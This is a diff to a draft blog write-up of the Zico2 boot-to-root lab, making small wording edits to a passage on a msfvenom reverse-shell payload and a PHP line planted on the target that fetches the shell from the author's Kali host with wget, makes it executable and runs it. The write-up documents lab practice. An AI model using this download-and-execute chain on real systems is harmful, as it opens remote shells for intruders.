DanHatesNumbers/danhatesnumbers.github.io/_drafts/BootToRoot-Zico2.md

 * `-a x64` - x64 architecture.
 Despite the payload being for the x64 architecture, msfvenom still needs to know which architecture to build for.
 * `--platform linux` - Build for Linux.
 Despite the payload being for Linux, msfvenom still needs to know which platform to build for.
 * `LHOST=192.168.56.102` - Set the LHOST variable (the target for the reverse shell to connect to) to my Kali VM's IP address
-* `LPORT=12345` - Connect to a the listener on port 12345
+* `LPORT=12345` - Connect to a listener on port 12345

 Next I started an HTTP server in the directory that contained my payload using the Python SimpleHTTPServer module by running `python -m SimpleHTTPServer 8000`.

-Then I had to create the PHP script on the target VM to download and execute my payload.
+After that, I had to create the PHP script on the target VM to download and execute my payload.
 The contents of that script was:

 ``` php
 <?php system("cd /tmp; wget http://192.168.56.102:8000/shell; chmod a+x shell; ./shell"); ?>